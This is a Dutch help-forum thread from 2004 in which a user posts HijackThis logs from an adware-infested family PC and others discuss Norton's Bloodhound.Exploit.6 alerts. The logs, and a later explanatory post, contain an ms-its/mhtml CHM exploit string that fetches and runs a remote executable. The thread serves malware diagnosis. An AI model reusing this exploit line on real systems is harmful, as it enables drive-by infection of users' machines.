de zoveelste hijack log

[Friggel]

Hey hey allemaal!
Zit hier bij mijn ouders en het is me hier toch een bende met popups, search bars en reclame prut. Thuis heb ik het met ad-ware en voorzichtig surfen toch wel schoon gehouden maar mijn zusjes zijn duidelijk niet zo voorzichtig te werk gegaan. Hieronder de log van Hijack zou super zijn als iemand me kan helpen!

Logfile of HijackThis v1.97.7
Scan saved at 21:34:40, on 5-9-2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Trend Micro\PC-cillin 2002\Tmntsrv.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCPFW.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Trend Micro\PC-cillin 2002\pccguide.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCClient.exe
C:\Program Files\Trend Micro\PC-cillin 2002\Pop3trap.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\WINDOWS\System32\RUNDLL32.EXE
C:\Program Files\MSN Apps\Updater\01.02.0002.1001\nl\msnappau.exe
c:\progra~1\intern~1\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Trend Micro\PC-cillin 2002\WebTrap.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\temp\HijackThis.exe
C:\Program Files\Internet Explorer\iexplore.exe

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.pdivwhygybgyqji.biz/d5LxLV0R7VD2rmnmAAU7n02o_S8kR7xGEYAgXrZywX4/CiL9Ry6LH40TuoOkjKf1.jpg
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {765880AC-2C93-CD0F-A47D-9257773F75B6} - C:\PROGRA~1\INTERN~2\Bend Love.exe
O2 - BHO: (no name) - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.02.0002.1001\en-xu\stmain.dll (disabled by BHODemon)
O2 - BHO: (no name) - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\01.02.2001.0001\nl\msntb.dll
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: MSN - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\01.02.2001.0001\nl\msntb.dll
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\pccguide.exe"
O4 - HKLM\..\Run: [PCCClient.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\PCCClient.exe"
O4 - HKLM\..\Run: [Pop3trap.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\Pop3trap.exe"
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [msnappau] "C:\Program Files\MSN Apps\Updater\01.02.0002.1001\nl\msnappau.exe"
O4 - HKLM\..\Run: [Nurb Meal] C:\PROGRA~1\TIMEFR~1\window glue junk.exe
O4 - HKLM\..\Run: [zBrowser Launcher] C:\Program Files\Logitech\iTouch\iTouch.exe
O4 - HKLM\..\Run: [Knobmovejugsstop] C:\Documents and Settings\All Users\Application Data\okay close knob move\LOCKS LOAD.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MessengerPlus3] "C:\Program Files\Messenger Plus! 3\MsgPlus.exe" /WinStart
O4 - HKCU\..\Run: [Yahoo! Pager] C:\Program Files\Yahoo!\Messenger\ypager.exe -quiet
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O8 - Extra context menu item: &Download with &DAP - C:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: Download &all with DAP - C:\PROGRA~1\DAP\dapextie2.htm
O9 - Extra 'Tools' menuitem: Sun Java Console (HKLM)
O9 - Extra 'Tools' menuitem: Launch Copernic Agent (HKLM)
O9 - Extra button: Copernic Agent (HKLM)
O9 - Extra button: Yahoo! Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Windows Messenger (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {10000000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://www.free32.com/POP.CHM::/sp.exe
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab
O16 - DPF: {30528230-99F7-4BB4-88D8-FA1D4F56A2AB} (YInstStarter Class) - http://download.yahoo.com/dl/installs/yinst0401.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6/E/F6E491A6-77E1-4E20-9F5F-94901338C922/wmv9VCM.CAB
O16 - DPF: {54B52E52-8000-4413-BD67-FC7FE24B59F2} (EARTPatchX Class) - http://files.ea.com/downloads/rtpatch/v2/EARTPX.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.c...ls/en/x86/client/wuweb_site.cab?1093037153578
O16 - DPF: {68BCE50A-DC9B-4519-A118-6FDA19DB450D} (Info Class) - http://www.wow-europe.com/signup/en/wowbeta/Si.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab
O16 - DPF: {B9191F79-5613-4C76-AA2A-398534BB8999} (YAddBook Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/suite/autocomplete.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {DE591B16-A452-11D6-AED1-0001030A4E46} (PBGNX Control) - https://gto.postbank.nl/GTO/PBGNX.cab
O16 - DPF: {F6BF0D00-0B2A-4A75-BF7B-F385591623AF} (Solitaire Showdown Class) - http://messenger.zone.msn.com/binary/SolitaireShowdown.cab



Ik ben wel ingelogd op mijn eigen gebruiker. Geen idee of dit gebruiker-afhankelijk is. Maar als dat zo is dan zal ik later wel een logje maken op een van de andere gebruikers.

Alvast bedankt!

 

[upsidaisy]

Kijk hier even voor de juiste plaatsing:

http://www.helpmij.nl/forum/forumdisplay.php?forumid=243

 

[buffy]

Geplaatst door upsidaisy
Kijk hier even voor de juiste plaatsing:

http://www.helpmij.nl/forum/forumdisplay.php?forumid=243

En wat heeft Friggel dan verkeerd gedaan, Upsidaisy? Het log staat netjes in de sectie voor HijackThis-logs, precies zoals in de link die jij geeft wordt geadviseerd.


Friggel,

Dit log staat op de juiste plaats hoor.

 

[H@ns]

Geplaatst door upsidaisy
Kijk hier even voor de juiste plaatsing:

http://www.helpmij.nl/forum/forumdisplay.php?forumid=243

Hoi Upsidaisy,

Zoals al vele malen aan je verteld, dit logje IS goed geplaatst

 

[H@ns]

Friggel,

Update eerst even naar HijackThis 1.98.2:

http://radiosplace.com

Maak hiermee een nieuw logje, en post dat hier

 

[Friggel]

Hoihoi heb geupdate naar de nieuwe versie dus hierstie dan. Iedereen al bedankt voor de reactie en tijd!



Logfile of HijackThis v1.98.2
Scan saved at 22:00:24, on 5-9-2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Trend Micro\PC-cillin 2002\Tmntsrv.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCPFW.exe
C:\Program Files\Trend Micro\PC-cillin 2002\pccguide.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCClient.exe
C:\Program Files\Trend Micro\PC-cillin 2002\Pop3trap.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\WINDOWS\System32\RUNDLL32.EXE
C:\Program Files\MSN Apps\Updater\01.02.0002.1001\nl\msnappau.exe
C:\Program Files\Logitech\iTouch\iTouch.exe
c:\progra~1\intern~1\iexplore.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Trend Micro\PC-cillin 2002\WebTrap.EXE
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\temp\HijackThis.exe

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.pdivwhygybgyqji.biz/d5LxLV0R7VD2rmnmAAU7n02o_S8kR7xGEYAgXrZywX4/CiL9Ry6LH40TuoOkjKf1.jpg
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {765880AC-2C93-CD0F-A47D-9257773F75B6} - C:\PROGRA~1\INTERN~2\Bend Love.exe
O2 - BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.02.0002.1001\en-xu\stmain.dll (disabled by BHODemon)
O2 - BHO: MSNToolBandBHO - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\01.02.2001.0001\nl\msntb.dll
O3 - Toolbar: Copernic Agent - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - C:\Program Files\Copernic Agent\CopernicAgentExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: MSN - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\01.02.2001.0001\nl\msntb.dll
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\pccguide.exe"
O4 - HKLM\..\Run: [PCCClient.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\PCCClient.exe"
O4 - HKLM\..\Run: [Pop3trap.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\Pop3trap.exe"
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [msnappau] "C:\Program Files\MSN Apps\Updater\01.02.0002.1001\nl\msnappau.exe"
O4 - HKLM\..\Run: [Nurb Meal] C:\PROGRA~1\TIMEFR~1\window glue junk.exe
O4 - HKLM\..\Run: [zBrowser Launcher] C:\Program Files\Logitech\iTouch\iTouch.exe
O4 - HKLM\..\Run: [Knobmovejugsstop] C:\Documents and Settings\All Users\Application Data\okay close knob move\LOCKS LOAD.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MessengerPlus3] "C:\Program Files\Messenger Plus! 3\MsgPlus.exe" /WinStart
O4 - HKCU\..\Run: [Yahoo! Pager] C:\Program Files\Yahoo!\Messenger\ypager.exe -quiet
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O8 - Extra context menu item: &Download with &DAP - C:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: Download &all with DAP - C:\PROGRA~1\DAP\dapextie2.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - (no file)
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - (no file)
O9 - Extra button: (no name) - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra 'Tools' menuitem: Launch Copernic Agent - {193B17B0-7C9F-4D5B-AEAB-8D3605EFC084} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Copernic Agent - {688DC797-DC11-46A7-9F1B-445F4F58CE6E} - C:\PROGRA~1\COPERN~1\COPERN~1.EXE
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\PROGRA~1\Yahoo!\MESSEN~1\YPager.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\PROGRA~1\Yahoo!\MESSEN~1\YPager.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab
O16 - DPF: {10000000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://www.free32.com/POP.CHM::/sp.exe
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab
O16 - DPF: {54B52E52-8000-4413-BD67-FC7FE24B59F2} (EARTPatchX Class) - http://files.ea.com/downloads/rtpatch/v2/EARTPX.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.c...ls/en/x86/client/wuweb_site.cab?1093037153578
O16 - DPF: {68BCE50A-DC9B-4519-A118-6FDA19DB450D} (Info Class) - http://www.wow-europe.com/signup/en/wowbeta/Si.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab
O16 - DPF: {B9191F79-5613-4C76-AA2A-398534BB8999} (YAddBook Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/suite/autocomplete.cab
O16 - DPF: {DE591B16-A452-11D6-AED1-0001030A4E46} (PBGNX Control) - https://gto.postbank.nl/GTO/PBGNX.cab
O16 - DPF: {F6BF0D00-0B2A-4A75-BF7B-F385591623AF} (Solitaire Showdown Class) - http://messenger.zone.msn.com/binary/SolitaireShowdown.cab

Groet'n
Friggel

 

[upsidaisy]

@ Friggel:Sorry ik had het aangezien voor nieuw bericht
en keek niet naar de sectie.

@ Buffy:Je hebt gelijk maar zag het als nieuw bericht.

@ H@NsiePanzzzer:Je schrijft zoals zovele malen etc.
ik ben me hiervan niet bewust.Een keer was een verwijzing gesloten en meerdere keren met deze erbij ben ik me niet bewust.Daarbij komt dat Buffy al een opmerking heeft gemaakt aangaande de verwijzing,wat is dan je meerwaarde van dit nog een keertje te doen ?

 

[crash]

Geplaatst door upsidaisy
@ H@NsiePanzzzeraarbij komt dat Buffy al een opmerking heeft gemaakt aangaande de verwijzing,wat is dan je meerwaarde van dit nog een keertje te doen ?

upsidaisy, waarschijnlijk was Hans net zijn bericht aan het typen, toen Buffy deze plaatste.
(zie de tijd van plaatsing)


PS waarom krijg ik een melding van Norton, als ik een nieuw bericht wil plaatsen in deze topic?

 

[upsidaisy]

@ crash:Krijg ook sinds mijn inloggen op helpmij een
opmerking van Norton .Heb eea al gecontroleerd op virus,trojan etc (bij meerdere online scanners,want ben zelf ook verbaast) maar resultaat is geen virus.Draai verder zeer regelmatig Ad-Aware,Spybot en overige prog en ook schoon.Als je het weet hoor ik het graag.

 

[buffy]

Geplaatst door upsidaisy
@ crash:Krijg ook sinds mijn inloggen op helpmij een
opmerking van Norton .Heb eea al gecontroleerd op virus,trojan etc (bij meerdere online scanners,want ben zelf ook verbaast) maar resultaat is geen virus.Draai verder zeer regelmatig Ad-Aware,Spybot en overige prog en ook schoon.Als je het weet hoor ik het graag.

Hoi Upsidaisy, luidt die melding van Norton toevallig "Bloodhound.Exploit.6"?

 

[upsidaisy]

Hoi Buffy,

Je mag niet meer raden.

Las op internet dat hier sprake zou kunnen zijn van "vals alarm" .Zal het nog wel even uitspitten.

 

[crash]

Geplaatst door buffy
Hoi Upsidaisy, luidt die melding van Norton toevallig "Bloodhound.Exploit.6"?

Hier wel, zit het soms in het log?
(zie bijlage)

 

[buffy]

Om die "Bloodhound.Exploit.6" meldingen hoef je je echt geen zorgen te maken. Waarom Norton die meldingen precies geeft is nog niet duidelijk, maar duidelijk is wel dat ze niet betekenen dat er narigheid op je pc staat.

 

[upsidaisy]

@Buffy:Ben wel benieuwd wat er dan wel achter zit.
Mocht je het weten dan hoor ik het graag.
Nou stop ik want dit is de afdeling Hijackthis Log's.

Succes

 

[nteusink]

http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html

Bloodhound.Exploit.6 is a heuristic detection for exploits of a Microsoft Internet Explorer vulnerability. This vulnerability was discovered in February 2004.

The vulnerability results from the incorrect handling of HTML files em<hhh>bedded in CHM files. (CHM is the Microsoft-compiled HTML help format.)

De exploit voor die bug ziet er zo uit:

ms-its:mhtml:file://C:\foo.mht!ht<hhh>tp://www.free32.com/POP.CHM::/sp.exe


Norton herkent het patroon in de pagina (in het log in dit geval) en ziet het als een aanvalspoging.

 

[buffy]

Geplaatst door nteusink
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html



De exploit voor die bug ziet er zo uit:

ms-its:mhtml:file://C:\foo.mht!ht<hhh>tp://www.free32.com/POP.CHM::/sp.exe


Norton herkent het patroon in de pagina (in het log in dit geval) en ziet het als een aanvalspoging.

Hoi Niels,

deze verklaring was mij al lang bekend. Helaas verklaart dit niet waarom Norton deze melding ook vaak geeft bij logs of pagina's waar dat patroon helemaal niet in voorkomt (en vaak die melding níet geeft terwijl het patroon wél voorkomt...). Ik heb inmiddels contact met iemand van Symantec over dit probleem; als het goed is weet ik over een paar weken meer over deze meldingen te vertellen.

 

[nteusink]

Geplaatst door buffy
deze verklaring was mij al lang bekend. Helaas verklaart dit niet waarom Norton deze melding ook vaak geeft bij logs of pagina's waar dat patroon helemaal niet in voorkomt (en vaak die melding níet geeft terwijl het patroon wél voorkomt...). Ik heb inmiddels contact met iemand van Symantec over dit probleem; als het goed is weet ik over een paar weken meer over deze meldingen te vertellen.

okay, gebruik zelf geen norton dus veel meer kan ik er ook niet over zeggen in dit geval kan ik me wel voorstellen dat de scanner alarm slaat.
Misschien moeten we op het forum een gedeelte van de string (ms-its: bijvoorbeeld) laten vervangen door de desbetreffende character codes.... Dan is de melding in de meeste gevallen weg denk ik.

 

[crash]

Geplaatst door buffy
Om die "Bloodhound.Exploit.6" meldingen hoef je je echt geen zorgen te maken. Waarom Norton die meldingen precies geeft is nog niet duidelijk, maar duidelijk is wel dat ze niet betekenen dat er narigheid op je pc staat.

Het zit kennelijk in de Temporary internet files map, waar Norton op reageerde.
Nou wordt deze steeds leeg gemaakt bij mij, dus veel kwaad kan het inderdaad niet.